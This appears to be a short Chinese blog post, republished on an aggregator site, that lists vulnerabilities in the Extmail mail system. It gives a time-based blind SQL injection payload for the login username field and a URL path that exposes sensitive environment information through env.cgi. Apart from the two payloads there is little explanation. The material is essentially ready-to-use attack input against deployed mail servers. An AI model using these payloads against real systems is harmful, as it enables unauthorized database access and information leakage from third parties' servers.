应用安全 - 邮件系统 - Extmail - 漏洞汇总

Posted atesetenginner

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了应用安全 - 邮件系统 - Extmail - 漏洞汇总相关的知识,希望对你有一定的参考价值。

前台SQL注入

payload(username处存在延迟注入):
admin AND if(ascii(substring(user(),1,1))>104,benchmark(2000000,md5(0x72696e67)),1)%23

 

前台敏感信息泄露

payload:
http://xxx.xxx.com/extmail/cgi/env.cgi

 

以上是关于应用安全 - 邮件系统 - Extmail - 漏洞汇总的主要内容,如果未能解决你的问题,请参考以下文章

Linux extmail的邮件服务器搭建

Postfix - Extmail 邮箱系统

Extmail邮件服务器centos搭建

如何在windows下部署extmail

extmail 登录时自动截取@域名部分,全称也可以登录

Extmail简单搭建